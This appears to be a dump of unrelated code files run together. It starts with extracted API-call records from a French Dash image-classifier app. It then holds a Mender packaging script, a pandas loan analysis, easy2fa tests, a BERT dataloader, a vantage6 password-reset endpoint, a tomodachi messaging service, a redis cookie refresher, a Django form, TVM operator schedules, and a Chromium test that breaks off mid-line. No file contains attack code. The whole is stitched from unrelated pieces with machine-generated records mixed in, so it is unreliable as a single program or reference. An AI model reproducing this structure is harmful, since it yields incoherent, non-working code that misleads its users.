3289), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""mon-image"""'}), "(id='mon-image')\n", (3273, 3289), True, 'import dash_html_components as html\n'), ((3295, 3326), 'dash_html_components.Div', 'html.Div', ([], {'id': '"""ma-zone-resultat"""'}), "(id='ma-zone-resultat')\n", (3303, 3326), True, 'import dash_html_components as html\n'), ((3393, 3431), 'dash.dependencies.Input', 'Input', (['"""bouton-chargement"""', '"""contents"""'], {}), "('bouton-chargement', 'contents')\n", (3398, 3431), False, 'from dash.dependencies import Input, Output\n'), ((5748, 5813), 'dash.dependencies.Input', 'Input', ([], {'component_id': '"""mon-champ-texte"""', 'component_property': '"""value"""'}), "(component_id='mon-champ-texte', component_property='value')\n", (5753, 5813), False, 'from dash.dependencies import Input, Output\n'), ((4471, 4483), 'io.BytesIO', 'io.BytesIO', ([], {}), '()\n', (4481, 4483), False, 'import io\n'), ((1819, 1866), 'dash_html_components.H5', 'html.H5', (['"""Présentation"""'], {'className': '"""card-title"""'}), "('Présentation', className='card-title')\n", (1826, 1866), True, 'import dash_html_components as html\n'), ((1888, 2301), 'dash_html_components.P', 'html.P', (['["Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ]'], {'className': '"""card-text"""'}), '([\n "Cette application à pour but de réaliser des modèles capables de classer des panneaux de signalisation allemand à partir d\'une image. L\'application fonctionne de la manière suivante : vous déposer une image à l\'emplacement indiqué et la prédiction du modèle apparait immédiatement en dessous. En haut à droite vous pouvez sélectionner le modèle que vous voulez tester."\n ], className=\'card-text\')\n', (1894, 2301), True, 'import dash_html_components as html\n'), ((3629, 3661), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (3645, 3661), False, 'import base64\n'), ((3777, 3814), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (3784, 3814), True, 'import dash_html_components as html\n'), ((3832, 3886), 'dash_html_components.Img', 'html.Img', ([], {'src': 'contents', 'style': "{'margin-left': '750px'}"}), "(src=contents, style={'margin-left': '750px'})\n", (3840, 3886), True, 'import dash_html_components as html\n'), ((4016, 4025), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (4023, 4025), True, 'import dash_html_components as html\n'), ((1411, 1466), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""Réseau de Neurones"""'], {'header': '(True)'}), "('Réseau de Neurones', header=True)\n", (1431, 1466), True, 'import dash_bootstrap_components as dbc\n'), ((1484, 1521), 'dash_bootstrap_components.DropdownMenuItem', 'dbc.DropdownMenuItem', (['"""SVM"""'], {'href': '"""#"""'}), "('SVM', href='#')\n", (1504, 1521), True, 'import dash_bootstrap_components as dbc\n'), ((2879, 2911), 'dash_html_components.A', 'html.A', (['"""sélectionner une image"""'], {}), "('sélectionner une image')\n", (2885, 2911), True, 'import dash_html_components as html\n'), ((4344, 4376), 'base64.b64decode', 'base64.b64decode', (['content_string'], {}), '(content_string)\n', (4360, 4376), False, 'import base64\n'), ((4690, 4717), 'base64.b64encode', 'base64.b64encode', (['img_bytes'], {}), '(img_bytes)\n', (4706, 4717), False, 'import base64\n'), ((4950, 4987), 'dash_html_components.Hr', 'html.Hr', ([], {'style': "{'margin-top': '75px'}"}), "(style={'margin-top': '75px'})\n", (4957, 4987), True, 'import dash_html_components as html\n'), ((5009, 5101), 'dash_html_components.Img', 'html.Img', ([], {'src': "('data:image/png;base64,' + content_string)", 'style': "{'margin-left': '750px'}"}), "(src='data:image/png;base64,' + content_string, style={\n 'margin-left': '750px'})\n", (5017, 5101), True, 'import dash_html_components as html\n'), ((5234, 5243), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5241, 5243), True, 'import dash_html_components as html\n'), ((5338, 5347), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5345, 5347), True, 'import dash_html_components as html\n'), ((5454, 5463), 'dash_html_components.Hr', 'html.Hr', ([], {}), '()\n', (5461, 5463), True, 'import dash_html_components as html\n'), ((5501, 5524), 'dash_html_components.Div', 'html.Div', (['"""Raw Content"""'], {}), "('Raw Content')\n", (5509, 5524), True, 'import dash_html_components as html\n'), ((5546, 5581), 'dash_html_components.Pre', 'html.Pre', (['contents'], {'style': 'pre_style'}), '(contents, style=pre_style)\n', (5554, 5581), True, 'import dash_html_components as html\n')] |
# Copyright 2021 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import setuptools
import re
VERSIONFILE = "src/mender/_version.py"
version_string_line = open(VERSIONFILE, "rt").read()
VSRE = r"^__version__ = ['\"]([^'\"]*)['\"]"
match = re.search(VSRE, version_string_line, re.M)
if match:
version_string = match.group(1)
else:
raise RuntimeError("Unable to find version string in %s." % (VERSIONFILE,))
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setuptools.setup(
name="mender-python-client-mendersoftware",
version=version_string,
license="Apache 2.0",
author="Mendersoftware",
author_email="<EMAIL>",
description="A Python implementation of the Mender client interface",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/mendersoftware/mender-python-client",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
keywords=["mender", "OTA", "updater"],
packages=setuptools.find_packages(where="src"),
install_requires=["cryptography", "requests", "msgpack", "websockets"],
entry_points={"console_scripts": ["mender-python-client=mender.mender:main"]},
package_dir={"": "src"},
python_requires=">=3.6",
zip_safe=False,
include_package_data=True,
)
| [
"setuptools.find_packages",
"re.search"
] | [((781, 823), 're.search', 're.search', (['VSRE', 'version_string_line', 're.M'], {}), '(VSRE, version_string_line, re.M)\n', (790, 823), False, 'import re\n'), ((1687, 1724), 'setuptools.find_packages', 'setuptools.find_packages', ([], {'where': '"""src"""'}), "(where='src')\n", (1711, 1724), False, 'import setuptools\n')] |
# --------------
# Importing header files
import numpy as np
import pandas as pd
from scipy.stats import mode
# code starts here
bank = pd.read_csv(path)
categorical_var = bank.select_dtypes(include = 'object')
print(categorical_var)
numerical_var = bank.select_dtypes(include = 'number')
print(numerical_var)
banks = bank.drop(columns=['Loan_ID'])
bank_mode = banks.mode()
banks = banks.fillna(bank_mode.iloc[0])
print(banks.isnull().sum())
avg_loan_amount = pd.pivot_table(banks, index=['Gender', 'Married', 'Self_Employed'], values='LoanAmount', aggfunc = 'mean')
print(avg_loan_amount)
loan_approved_se = banks[ (banks['Self_Employed'] == "Yes") & (banks['Loan_Status'] == "Y") ]
loan_approved_nse = banks[ (banks['Self_Employed'] == "No") & (banks['Loan_Status'] == "Y") ]
percentage_se = (len(loan_approved_se) / 614) * 100
percentage_nse = (len(loan_approved_nse) / 614) * 100
# loan amount term
loan_term = banks['Loan_Amount_Term'].apply(lambda x: int(x)/12 )
big_loan_term=len(loan_term[loan_term>=25])
print(big_loan_term)
columns_to_show = ['ApplicantIncome', 'Credit_History']
loan_groupby=banks.groupby(['Loan_Status'])[columns_to_show]
# Check the mean value
mean_values=loan_groupby.agg([np.mean])
print(mean_values)
# code ends here
| [
"pandas.pivot_table",
"pandas.read_csv"
] | [((150, 167), 'pandas.read_csv', 'pd.read_csv', (['path'], {}), '(path)\n', (161, 167), True, 'import pandas as pd\n'), ((489, 598), 'pandas.pivot_table', 'pd.pivot_table', (['banks'], {'index': "['Gender', 'Married', 'Self_Employed']", 'values': '"""LoanAmount"""', 'aggfunc': '"""mean"""'}), "(banks, index=['Gender', 'Married', 'Self_Employed'], values=\n 'LoanAmount', aggfunc='mean')\n", (503, 598), True, 'import pandas as pd\n')] |
from unittest import TestCase
from unittest.mock import patch
from easy2fa import cli
class TestCheckInput(TestCase):
@patch('builtins.input')
def test_default(self, mock_input):
mock_input.return_value = ''
self.assertEquals(cli.check_input('prompt', default='one'), 'one')
mock_input.return_value = 'two'
self.assertEquals(cli.check_input('prompt', default='one'), 'two')
@patch('builtins.input')
@patch('builtins.print')
def test_assertions(self, mock_print, mock_input):
def assertion(value):
if value not in ['yes', 'no']:
return 'use yes or no'
mock_input.side_effect = ['input', '', 'no']
self.assertEquals(cli.check_input('prompt', assertion=assertion),
'no')
mock_print.assert_called_with('\tInvalid input: use yes or no')
| [
"easy2fa.cli.check_input",
"unittest.mock.patch"
] | [((126, 149), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (131, 149), False, 'from unittest.mock import patch\n'), ((423, 446), 'unittest.mock.patch', 'patch', (['"""builtins.input"""'], {}), "('builtins.input')\n", (428, 446), False, 'from unittest.mock import patch\n'), ((452, 475), 'unittest.mock.patch', 'patch', (['"""builtins.print"""'], {}), "('builtins.print')\n", (457, 475), False, 'from unittest.mock import patch\n'), ((253, 293), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (268, 293), False, 'from easy2fa import cli\n'), ((368, 408), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'default': '"""one"""'}), "('prompt', default='one')\n", (383, 408), False, 'from easy2fa import cli\n'), ((723, 769), 'easy2fa.cli.check_input', 'cli.check_input', (['"""prompt"""'], {'assertion': 'assertion'}), "('prompt', assertion=assertion)\n", (738, 769), False, 'from easy2fa import cli\n')] |
from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler
from bert_finetuning.data import GermanData
class GermanDataLoader:
def __init__(
self,
data_paths,
model_name,
do_cleansing,
max_sequence_length,
batch_size=8,
dataset_cls=GermanData,
):
self.german_data = dataset_cls(
data_paths,
model_name,
max_sequence_length=max_sequence_length,
do_cleansing=do_cleansing,
)
self.batch_size = batch_size
self.create_loaders()
def create_loaders(self):
"""
Create Torch dataloaders for data splits
"""
self.german_data.text_to_tensors()
print("creating dataloaders")
train_data = TensorDataset(
self.german_data.train_inputs,
self.german_data.train_masks,
self.german_data.train_labels,
)
train_sampler = RandomSampler(train_data)
self.train_dataloader = DataLoader(
train_data, sampler=train_sampler, batch_size=self.batch_size
)
validation_data = TensorDataset(
self.german_data.validation_inputs,
self.german_data.validation_masks,
self.german_data.validation_labels,
)
validation_sampler = SequentialSampler(validation_data)
self.validation_dataloader = DataLoader(
validation_data, sampler=validation_sampler, batch_size=self.batch_size
)
test_data = TensorDataset(
self.german_data.test_inputs,
self.german_data.test_masks,
self.german_data.test_labels,
)
test_sampler = SequentialSampler(test_data)
self.test_dataloader = DataLoader(
test_data, sampler=test_sampler, batch_size=self.batch_size
)
print("finished creating dataloaders")
"""
** FOR DEBUGGING **
if __name__ == "__main__":
## define data paths
germeval_data_paths = {
"train": "./datasets/hasoc_dataset/hasoc_german_train.csv",
"dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv",
"test": "./datasets/hasoc_dataset/hasoc_german_test.csv",
}
hasoc_german_data_paths = {
"train": "./datasets/hasoc_dataset/hasoc_german_train.csv",
"dev": "./datasets/hasoc_dataset/hasoc_german_validation.csv",
"test": "./datasets/hasoc_dataset/hasoc_german_test.csv",
}
## create dataloaders
print("creating germeval dataloaders...")
germ_eval_dataloader = GermanDataLoader(germeval_data_paths)
print("creating hasoc dataloaders...")
hasoc_german_dataloader = GermanDataLoader(hasoc_german_data_paths)
"""
| [
"torch.utils.data.RandomSampler",
"torch.utils.data.SequentialSampler",
"torch.utils.data.TensorDataset",
"torch.utils.data.DataLoader"
] | [((837, 946), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.train_inputs', 'self.german_data.train_masks', 'self.german_data.train_labels'], {}), '(self.german_data.train_inputs, self.german_data.train_masks,\n self.german_data.train_labels)\n', (850, 946), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1019, 1044), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_data'], {}), '(train_data)\n', (1032, 1044), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1078, 1151), 'torch.utils.data.DataLoader', 'DataLoader', (['train_data'], {'sampler': 'train_sampler', 'batch_size': 'self.batch_size'}), '(train_data, sampler=train_sampler, batch_size=self.batch_size)\n', (1088, 1151), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1205, 1330), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.validation_inputs', 'self.german_data.validation_masks', 'self.german_data.validation_labels'], {}), '(self.german_data.validation_inputs, self.german_data.\n validation_masks, self.german_data.validation_labels)\n', (1218, 1330), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1407, 1441), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['validation_data'], {}), '(validation_data)\n', (1424, 1441), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1480, 1568), 'torch.utils.data.DataLoader', 'DataLoader', (['validation_data'], {'sampler': 'validation_sampler', 'batch_size': 'self.batch_size'}), '(validation_data, sampler=validation_sampler, batch_size=self.\n batch_size)\n', (1490, 1568), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1611, 1717), 'torch.utils.data.TensorDataset', 'TensorDataset', (['self.german_data.test_inputs', 'self.german_data.test_masks', 'self.german_data.test_labels'], {}), '(self.german_data.test_inputs, self.german_data.test_masks,\n self.german_data.test_labels)\n', (1624, 1717), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1789, 1817), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['test_data'], {}), '(test_data)\n', (1806, 1817), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n'), ((1850, 1921), 'torch.utils.data.DataLoader', 'DataLoader', (['test_data'], {'sampler': 'test_sampler', 'batch_size': 'self.batch_size'}), '(test_data, sampler=test_sampler, batch_size=self.batch_size)\n', (1860, 1921), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler\n')] |
# -*- coding: utf-8 -*-
import logging
import datetime
from flask import request, render_template
from flask_jwt_extended import (
create_access_token,
decode_token
)
from jwt.exceptions import DecodeError
from flasgger import swag_from
from http import HTTPStatus
from pathlib import Path
from sqlalchemy.orm.exc import NoResultFound
from vantage6.common import logger_name
from vantage6.server import db
from vantage6.server.resource import (
ServicesResources
)
module_name = logger_name(__name__)
log = logging.getLogger(module_name)
def setup(api, api_base, services):
path = "/".join([api_base, module_name])
log.info(f'Setting up "{path}" and subdirectories')
api.add_resource(
ResetPassword,
path+'/reset',
endpoint="reset_password",
methods=('POST',),
resource_class_kwargs=services
)
api.add_resource(
RecoverPassword,
path+'/lost',
endpoint='recover_password',
methods=('POST',),
resource_class_kwargs=services
)
# ------------------------------------------------------------------------------
# Resources / API's
# ------------------------------------------------------------------------------
class ResetPassword(ServicesResources):
"""user can use recover token to reset their password."""
@swag_from(str(Path(r"swagger/post_reset_password.yaml")),
endpoint='reset_password')
def post(self):
""""submit email-adress receive token."""
# retrieve user based on email or username
body = request.get_json()
reset_token = body.get("reset_token")
password = body.get("password")
if not reset_token or not password:
return {"msg": "reset token and/or password is missing!"}, \
HTTPStatus.BAD_REQUEST
# obtain user
try:
user_id = decode_token(reset_token)['identity'].get('id')
except DecodeError:
return {"msg": "Invalid recovery token!"}, HTTPStatus.BAD_REQUEST
log.debug(user_id)
user = db.User.get(user_id)
# set password
user.set_password(password)
user.save()
log.info(f"Successfull password reset for '{user.username}'")
return {"msg": "password successfully been reset!"}, \
HTTPStatus.OK
class RecoverPassword(ServicesResources):
"""send a mail containing a recover token"""
@swag_from(str(Path(r"swagger/post_recover_password.yaml")),
endpoint='recover_password')
def post(self):
"""username or email generates a token which is mailed."""
# default return string
ret = {"msg": "If the username or email is our database you "
"will soon receive an email"}
# obtain username/email from request'
body = request.get_json()
username = body.get("username")
email = body.get("email")
if not (email or username):
return {"msg": "No username or email provided!"}, \
HTTPStatus.BAD_REQUEST
# find user in the database, if not here we stop!
try:
if username:
user = db.User.get_by_username(username)
else:
user = db.User.get_by_email(email)
except NoResultFound:
# we do not tell them.... But we won't continue either
return ret
log.info(f"Password reset requested for '{user.username}'")
# generate a token that can reset their password
expires = datetime.timedelta(hours=1)
reset_token = create_access_token(
{"id": str(user.id)}, expires_delta=expires
)
self.mail.send_email(
"password reset",
sender="<EMAIL>",
recipients=[user.email],
text_body=render_template("mail/reset_password_token.txt",
token=reset_token),
html_body=render_template("mail/reset_password_token.html",
token=reset_token)
)
return ret
| [
"logging.getLogger",
"flask.render_template",
"vantage6.server.db.User.get",
"vantage6.server.db.User.get_by_email",
"pathlib.Path",
"vantage6.server.db.User.get_by_username",
"flask_jwt_extended.decode_token",
"flask.request.get_json",
"vantage6.common.logger_name",
"datetime.timedelta"
] | [((494, 515), 'vantage6.common.logger_name', 'logger_name', (['__name__'], {}), '(__name__)\n', (505, 515), False, 'from vantage6.common import logger_name\n'), ((522, 552), 'logging.getLogger', 'logging.getLogger', (['module_name'], {}), '(module_name)\n', (539, 552), False, 'import logging\n'), ((1577, 1595), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (1593, 1595), False, 'from flask import request, render_template\n'), ((2094, 2114), 'vantage6.server.db.User.get', 'db.User.get', (['user_id'], {}), '(user_id)\n', (2105, 2114), False, 'from vantage6.server import db\n'), ((2862, 2880), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (2878, 2880), False, 'from flask import request, render_template\n'), ((3582, 3609), 'datetime.timedelta', 'datetime.timedelta', ([], {'hours': '(1)'}), '(hours=1)\n', (3600, 3609), False, 'import datetime\n'), ((1354, 1394), 'pathlib.Path', 'Path', (['"""swagger/post_reset_password.yaml"""'], {}), "('swagger/post_reset_password.yaml')\n", (1358, 1394), False, 'from pathlib import Path\n'), ((2468, 2510), 'pathlib.Path', 'Path', (['"""swagger/post_recover_password.yaml"""'], {}), "('swagger/post_recover_password.yaml')\n", (2472, 2510), False, 'from pathlib import Path\n'), ((3214, 3247), 'vantage6.server.db.User.get_by_username', 'db.User.get_by_username', (['username'], {}), '(username)\n', (3237, 3247), False, 'from vantage6.server import db\n'), ((3289, 3316), 'vantage6.server.db.User.get_by_email', 'db.User.get_by_email', (['email'], {}), '(email)\n', (3309, 3316), False, 'from vantage6.server import db\n'), ((3869, 3936), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.txt"""'], {'token': 'reset_token'}), "('mail/reset_password_token.txt', token=reset_token)\n", (3884, 3936), False, 'from flask import request, render_template\n'), ((3998, 4066), 'flask.render_template', 'render_template', (['"""mail/reset_password_token.html"""'], {'token': 'reset_token'}), "('mail/reset_password_token.html', token=reset_token)\n", (4013, 4066), False, 'from flask import request, render_template\n'), ((1897, 1922), 'flask_jwt_extended.decode_token', 'decode_token', (['reset_token'], {}), '(reset_token)\n', (1909, 1922), False, 'from flask_jwt_extended import create_access_token, decode_token\n')] |
import os
from typing import Any, Callable, Dict
import tomodachi
from tomodachi import aws_sns_sqs, aws_sns_sqs_publish
from tomodachi.discovery import AWSSNSRegistration
from tomodachi.envelope import JsonBase
async def middleware_function(
func: Callable, service: Any, message: Any, topic: str, context: Dict, *args: Any, **kwargs: Any
) -> Any:
# Functionality before function is called
service.log("middleware before")
return_value = await func(*args, **kwargs)
# There's also the possibility to pass in extra arguments or keywords arguments, for example:
# return_value = await func(*args, id='overridden', **kwargs)
# Functinoality after function is called
service.log("middleware after")
return return_value
class ExampleAWSSNSSQSService(tomodachi.Service):
name = "example-aws-sns-sqs-service"
log_level = "INFO"
uuid = str(os.environ.get("SERVICE_UUID") or "")
# Build own "discovery" functions, to be run on start and stop
# See tomodachi/discovery/aws_sns_registration.py for example
discovery = [AWSSNSRegistration]
# The message envelope class defines how a message should be processed when sent and received
# See tomodachi/envelope/json_base.py for a basic example using JSON and transferring some metadata
message_envelope = JsonBase
# Adds a middleware function that is run on every incoming message.
# Several middlewares can be chained.
message_middleware = [middleware_function]
# Some options can be specified to define credentials, used ports, hostnames, access log, etc.
options = {
"aws_sns_sqs": {
"region_name": None, # specify AWS region (example: 'eu-west-1')
"aws_access_key_id": None, # specify AWS access key (example: '<KEY>')
"aws_secret_access_key": None, # specify AWS secret key (example: 'f7sha92hNotarealsecretkeyn29ShnSYQi3nzgA')
},
"aws_endpoint_urls": {
"sns": None, # For example 'http://localhost:4575' if localstack is used for testing
"sqs": None, # For example 'http://localhost:4576' if localstack is used for testing
},
}
@aws_sns_sqs("example-route1")
async def route1a(self, data: Any) -> None:
self.log('Received data (function: route1a) - "{}"'.format(data))
async def _started_service(self) -> None:
async def publish(data: Any, topic: str) -> None:
self.log('Publish data "{}"'.format(data))
await aws_sns_sqs_publish(self, data, topic=topic, wait=False)
await publish("友達", "example-route1")
| [
"tomodachi.aws_sns_sqs_publish",
"os.environ.get",
"tomodachi.aws_sns_sqs"
] | [((2184, 2213), 'tomodachi.aws_sns_sqs', 'aws_sns_sqs', (['"""example-route1"""'], {}), "('example-route1')\n", (2195, 2213), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n'), ((891, 921), 'os.environ.get', 'os.environ.get', (['"""SERVICE_UUID"""'], {}), "('SERVICE_UUID')\n", (905, 921), False, 'import os\n'), ((2514, 2570), 'tomodachi.aws_sns_sqs_publish', 'aws_sns_sqs_publish', (['self', 'data'], {'topic': 'topic', 'wait': '(False)'}), '(self, data, topic=topic, wait=False)\n', (2533, 2570), False, 'from tomodachi import aws_sns_sqs, aws_sns_sqs_publish\n')] |
# -*- coding: utf-8 -*-
# @Author: GXR
# @CreateTime: 2022-01-20
# @UpdateTime: 2022-01-20
import redis
import config
import cookie_login
from cookie_api import app
red = redis.Redis(
host=config.REDIS_HOST,
port=config.REDIS_PORT,
db=config.REDIS_DB,
decode_responses=True,
)
# 刷新cookie数量
def cookie_refresh():
while 1:
cookie_list = red.smembers(config.REDIS_KEY_COOKIE)
if len(cookie_list) >= config.COOKIE_COUNT:
break
cookie_login.run_cookie_login(1)
app.logger.info("[cookie数量正常]-[%s]" % len(cookie_list))
def run_cookie_refresh():
cookie_refresh()
if __name__ == "__main__":
run_cookie_refresh()
| [
"cookie_login.run_cookie_login",
"redis.Redis"
] | [((174, 281), 'redis.Redis', 'redis.Redis', ([], {'host': 'config.REDIS_HOST', 'port': 'config.REDIS_PORT', 'db': 'config.REDIS_DB', 'decode_responses': '(True)'}), '(host=config.REDIS_HOST, port=config.REDIS_PORT, db=config.\n REDIS_DB, decode_responses=True)\n', (185, 281), False, 'import redis\n'), ((484, 516), 'cookie_login.run_cookie_login', 'cookie_login.run_cookie_login', (['(1)'], {}), '(1)\n', (513, 516), False, 'import cookie_login\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
# start tutorial
from django.db import models
from djng.forms import NgModelFormMixin, NgFormValidationMixin
from djng.styling.bootstrap3.forms import Bootstrap3ModelForm
class SubscribeUser(models.Model):
full_name = models.CharField(
"<NAME>",
max_length=99)
avatar = models.ImageField("Avatar", blank=False, null=True)
permit = models.FileField("Permit", blank=True, null=True)
class SubscribeForm(NgModelFormMixin, NgFormValidationMixin, Bootstrap3ModelForm):
use_required_attribute = False
scope_prefix = 'subscribe_data'
form_name = 'my_form'
class Meta:
model = SubscribeUser
fields = ['full_name', 'avatar', 'permit']
| [
"django.db.models.ImageField",
"django.db.models.FileField",
"django.db.models.CharField"
] | [((288, 329), 'django.db.models.CharField', 'models.CharField', (['"""<NAME>"""'], {'max_length': '(99)'}), "('<NAME>', max_length=99)\n", (304, 329), False, 'from django.db import models\n'), ((361, 412), 'django.db.models.ImageField', 'models.ImageField', (['"""Avatar"""'], {'blank': '(False)', 'null': '(True)'}), "('Avatar', blank=False, null=True)\n", (378, 412), False, 'from django.db import models\n'), ((427, 476), 'django.db.models.FileField', 'models.FileField', (['"""Permit"""'], {'blank': '(True)', 'null': '(True)'}), "('Permit', blank=True, null=True)\n", (443, 476), False, 'from django.db import models\n')] |
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Compute and schedule for add, multiply, subtract slice op
Please note the following assumptions made by the implementation:
1) The inputs will be multiple of crouton layout except for the axis that needs broadcasting."""
from tvm import te
from tvm import tir
from tvm import topi
from ..utils import get_layout_transform_fn
def add_broadcast_compute(input_a, input_b):
"""Call the add op from topi"""
return topi.add(input_a, input_b)
def subtract_broadcast_compute(input_a, input_b):
"""Call the subtract op from topi"""
return topi.subtract(input_a, input_b)
def multiply_broadcast_compute(input_a, input_b):
"""Call the multiply op from topi"""
return topi.multiply(input_a, input_b)
def tir_broadcast_schedule(
out_m,
input_a,
input_b,
output_layout: str,
input_a_layout: str,
input_b_layout: str,
op_name: str,
):
"""Schedule for input and output layout nhwc-8h2w32c2w-2d considering broadcast"""
func = te.create_prim_func([input_a, input_b, out_m])
s = tir.Schedule(func)
block_dict = {"add": "T_add", "subtract": "T_subtract", "multiply": "T_multiply"}
block = s.get_block(block_dict[op_name])
if input_a_layout == "nhwc-8h2w32c2w-2d":
input_a_transformed_layout = get_layout_transform_fn(input_a_layout)
s.transform_layout(block, buffer=("read", 0), index_map=input_a_transformed_layout)
if input_b_layout == "nhwc-8h2w32c2w-2d":
input_b_transformed_layout = get_layout_transform_fn(input_b_layout)
s.transform_layout(block, buffer=("read", 1), index_map=input_b_transformed_layout)
output_transformed_layout = get_layout_transform_fn(output_layout)
s.transform_layout(block, buffer=("write", 0), index_map=output_transformed_layout)
n, h, w, c = s.get_loops(block)
h_o, h_i = s.split(h, [None, 8])
w_o, w_i = s.split(w, [None, 4])
c_o, c_i = s.split(c, [None, 32])
wio, wii = s.split(w_i, [None, 2])
s.reorder(n, h_o, w_o, c_o, h_i, wio, c_i, wii)
fused = s.fuse(c_i, wii)
s.vectorize(fused)
return s
| [
"tvm.topi.add",
"tvm.tir.Schedule",
"tvm.te.create_prim_func",
"tvm.topi.subtract",
"tvm.topi.multiply"
] | [((1274, 1300), 'tvm.topi.add', 'topi.add', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1282, 1300), False, 'from tvm import topi\n'), ((1410, 1441), 'tvm.topi.subtract', 'topi.subtract', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1423, 1441), False, 'from tvm import topi\n'), ((1551, 1582), 'tvm.topi.multiply', 'topi.multiply', (['input_a', 'input_b'], {}), '(input_a, input_b)\n', (1564, 1582), False, 'from tvm import topi\n'), ((1856, 1902), 'tvm.te.create_prim_func', 'te.create_prim_func', (['[input_a, input_b, out_m]'], {}), '([input_a, input_b, out_m])\n', (1875, 1902), False, 'from tvm import te\n'), ((1914, 1932), 'tvm.tir.Schedule', 'tir.Schedule', (['func'], {}), '(func)\n', (1926, 1932), False, 'from tvm import tir\n')] |
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import logging
import os
import unittest
from telemetry.core import browser_finder
from telemetry.core import exceptions
from telemetry.core import extension_to_load
from telemetry.core import util
from telemetry.core.backends.chrome import cros_interface
from telemetry.unittest import options_for_unittests
class CrOSAutoTest(unittest.TestCase):
def setUp(self):
options = options_for_unittests.GetCopy()
self._cri = cros_interface.CrOSInterface(options.cros_remote,
options.cros_ssh_identity)
self._is_guest = options.browser_type == 'cros-chrome-guest'
self._username = '' if self._is_guest else options.browser_options.username
self._password = options.browser_options.password
def _IsCryptohomeMounted(self):
"""Returns True if cryptohome is mounted"""
cryptohomeJSON, _ = self._cri.RunCmdOnDevice(['/usr/sbin/cryptohome',
'--action=status'])
cryptohomeStatus = json.loads(cryptohomeJSON)
return (cryptohomeStatus['mounts'] and
cryptohomeStatus['mounts'][0]['mounted'])
def _CreateBrowser(self, autotest_ext=False, auto_login=True):
"""Finds and creates a browser for tests. if autotest_ext is True,
also loads the autotest extension"""
options = options_for_unittests.GetCopy()
if autotest_ext:
extension_path = os.path.join(os.path.dirname(__file__), 'autotest_ext')
self._load_extension = extension_to_load.ExtensionToLoad(
path=extension_path,
browser_type=options.browser_type,
is_component=True)
options.extensions_to_load = [self._load_extension]
browser_to_create = browser_finder.FindBrowser(options)
self.assertTrue(browser_to_create)
options.browser_options.create_browser_with_oobe = True
options.browser_options.auto_login = auto_login
b = browser_to_create.Create()
b.Start()
return b
def _GetAutotestExtension(self, browser):
"""Returns the autotest extension instance"""
extension = browser.extensions[self._load_extension]
self.assertTrue(extension)
return extension
def _GetLoginStatus(self, browser):
extension = self._GetAutotestExtension(browser)
self.assertTrue(extension.EvaluateJavaScript(
"typeof('chrome.autotestPrivate') != 'undefined'"))
extension.ExecuteJavaScript('''
window.__login_status = null;
chrome.autotestPrivate.loginStatus(function(s) {
window.__login_status = s;
});
''')
return util.WaitFor(
